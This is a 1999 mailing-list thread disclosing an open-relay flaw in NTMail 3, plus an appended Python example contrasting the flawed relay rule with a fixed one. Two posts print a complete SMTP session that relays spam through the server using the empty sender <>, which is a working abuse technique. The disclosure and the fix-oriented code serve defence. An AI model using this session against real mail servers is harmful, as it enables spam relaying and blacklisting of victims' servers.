NTMail version 3 relay problem

NTmail3 appears to have a small hole that allows anyone to use an NTmail3 server as a relay mail server. Basically here is how it works.

NTmail3 is set to not allow relay (either the TO or FROM address must be local)
JUCE (a $500 antispamming add-on from the makers of NTmail) has been installed and used to lock the server down from the spammers.

    I:>open mail.someisp.net 25
    220-Unauthorized Use Prohibited
    220 mail.someisp.net WindowsNT SMTP Server v3.03.0017/1.aihl/SP ESMTP ready at Sun, 6 Jun 1999 10:39:30 -0400
    helo
    250 mail.someisp.net [192.168.0.0]
    mail from:<>
    250 Ok.
    rcpt to:poorsucker@aol.com
    250 Ok.
    data
    354 Start mail input, end with ..
    buy my crap
    sincerely,
    some lame spammer
    .
    250 Requested mail action Ok.

So the stupid program appears to think that <> is a local address. Not only that but if you use JUCE (the anti spam addon) and have it set to stop things with max messages (too many messages and the account gets shut down) it will give the postmaster notification when an account hits the max message limit, well <> doesn't cause any notification at all. In fact it appears to be a sort of special case and may actually get around some of the other anti spamming features built into NTmail3.

Gordano LTD (the author of NTmail) doesn't appear to care, their response was "we don't support V3 unless you pay", like I was asking a question or something... I've even offered to pay them to build me a fixed version but instead they have asked me to take the discussion elsewhere (instead of their mailing list). Ok, this is elsewhere.

Gordano's solution is to upgrade to NTmail 4, which costs oh.. about 4x what you paid for version 3.
Also if you purchase version 4 and find it unacceptable because of other problems (I can't run it because it can't handle the load that version 3 handles), Gordano will be more than happy to downgrade you to version 3 (this is how they are trying to retain some new customers who are totally unsatisfied with the quality of Version 4). So since they are still selling Version 3 in effect it is my opinion they should fix the damn thing.

Geo.

PS, NTMail 3.03 is over a year old and the new version has been out for about 4 months however it's got so many problems we had to revert back to version 3

--------------------------------------------------------------------------------
Date: Tue, 8 Jun 1999 12:07:17 -0400
From: Geo.
To: BUGTRAQ@netspace.org
Subject: NTMail3 has open relay hole

NTMail version 3 has an open relay exploit that allows anyone to send mail thru the server even if it's not local.

See http://www.nthelp.com/40/ntmailspam.htm for the details.

--------------------------------------------------------------------------------
Date: Tue, 8 Jun 1999 07:24:20 -0400
From: Geo.
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: NTMail 3 open relay

For all those of you still running NTMail version 3.x

    I:>open mail.someisp.net 25
    220-Unauthorized Use Prohibited
    220 mail.someisp.net WindowsNT SMTP Server v3.03.0017/1.aihl/SP ESMTP ready at Sun, 6 Jun 1999 10:39:30 -0400
    helo
    250 mail.someisp.net [192.168.0.0]
    mail from:<>
    250 Ok.
    rcpt to:poorsucker@aol.com
    250 Ok.
    data
    354 Start mail input, end with ..
    buy my crap
    sincerely,
    some lame spammer
    .
    250 Requested mail action Ok.

Your servers are an open relay host (anyone can relay mail thru them using <> as the FROM address), JUCE can't stop this, and as far as I can tell there really isn't any good way. ORBS tests for this and will black list your servers if they find it.

The solution is to upgrade to NTMail version 4 which doesn't have this particular problem.

Geo.
--------------------------------------------------------------------------------
Date: Tue, 8 Jun 1999 20:52:40 +0200
From: Peter van Dijk
To: BUGTRAQ@netspace.org
Subject: Re: NTMail3 has open relay hole

On Tue, Jun 08, 1999 at 12:07:17PM -0400, Geo. wrote:
> NTMail version 3 has an open relay exploit that allows anyone to send mail
> thru the server even if it's not local.
>
> See http://www.nthelp.com/40/ntmailspam.htm for the details.

Note that the <> mentioned here is the empty envelope sender which is required for bounces. Allowing it thru is still kinda stupid tho. A spammer exploiting this doesn't have to care about where his bounces go either :)

Greetz, Peter
--
| 'He broke my heart,    | Peter van Dijk
|  I broke his neck'     | peter@attic.vuurwerk.nl
|   nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl
|                        | Hardbeat@undernet - #groningen/#kinkfm/#vdh |

--------------------------------------------------------------------------------
Date: Thu, 10 Jun 1999 16:39:06 +0100
From: John Stanners
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NTMail 3 open relay

We have reviewed the posting of "NTMail version 3.x" being an open relay and there are several observations we would like to make:

1. The last version 3 of NTMail is a very old version and was superseded by version 4 in August 1998. Version 3.03.0018 is available on our FTP site for no charge for those who wish to update to the latest version 3. It is no longer available for purchase.

2. It is *not* true that NTMail is "an open relay" unless the relay options are changed from their default.

3. More flexibility in the relaying options was introduced in version 4 of NTMail which is available from http://www.ntmail.co.uk or sales@gordano.com.

In addition to normal support mechanisms, we welcome feedback of all kinds by e-mail to suggest@gordano.com.

Many thanks for allowing us to set the record straight.

John Stanners
Gordano Ltd

--------------------------------------------------------------------------------
Date: Wed, 9 Jun 1999 16:36:40 -0700
From: James Stephens
To: BUGTRAQ@netspace.org
Subject: Re: NTMail3 has open relay hole

At 12:07 PM 6/8/99 -0400, Geo. wrote:
>NTMail version 3 has an open relay exploit that allows anyone to send mail
>thru the server even if it's not local.
>
>See http://www.nthelp.com/40/ntmailspam.htm for the details.

Well, I tried out that little trick on a more recent version of NTMail 3.03.0006 and it didn't allow the relay. There is basic juce functionality in that version.

Regards,

James Stephens          James@iperform.net
Network Administrator   714-254-0200
Internet Performance    Fax: 714-254-0600
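
--------------------------------------------------------------------------------
The relay decision discussed in this thread, as an added example that is not part of the original posts and is not NTMail or JUCE code: it models the "either the TO or FROM address must be local" rule with <> counted as local, next to a rule that gives the empty envelope sender no relay rights. LOCAL_DOMAINS, the function names and the sample envelopes are assumptions made for the illustration.

```python
# Added illustration, not NTMail or JUCE code. LOCAL_DOMAINS and the
# sample envelopes are constructed for this example.
LOCAL_DOMAINS = {"someisp.net"}

def strip_brackets(addr):
    """Drop surrounding whitespace and the <...> of an SMTP path."""
    addr = addr.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    return addr.strip()

def is_null_sender(addr):
    """True for the empty envelope sender <> used on bounces."""
    return strip_brackets(addr) == ""

def is_local(addr):
    """True if the mailbox's domain is one this server hosts."""
    mailbox = strip_brackets(addr)
    if "@" not in mailbox:
        return False
    return mailbox.rsplit("@", 1)[1].lower() in LOCAL_DOMAINS

def relay_allowed_flawed(mail_from, rcpt_to):
    # "Either the TO or FROM address must be local", with <> counted
    # as local: the behaviour the first post infers from the session.
    return is_null_sender(mail_from) or is_local(mail_from) or is_local(rcpt_to)

def relay_allowed_strict(mail_from, rcpt_to):
    # An incoming bounce is addressed to a mailbox this server hosts,
    # so with a null sender the recipient alone decides.
    if is_null_sender(mail_from):
        return is_local(rcpt_to)
    return is_local(mail_from) or is_local(rcpt_to)

SAMPLE_ENVELOPES = [  # constructed (MAIL FROM, RCPT TO) pairs
    ("<>", "poorsucker@aol.com"),                     # session from the post
    ("<>", "<user@someisp.net>"),                     # bounce to a local user
    ("<user@someisp.net>", "friend@example.org"),     # local user sending out
    ("<stranger@example.org>", "other@example.net"),  # third-party relay
]

def relay_gaps(envelopes):
    """Envelopes the flawed rule relays but the strict rule refuses."""
    return [(f, t) for f, t in envelopes
            if relay_allowed_flawed(f, t) and not relay_allowed_strict(f, t)]

if __name__ == "__main__":
    for env in relay_gaps(SAMPLE_ENVELOPES):
        print("relayed only because <> was treated as local:", env)
```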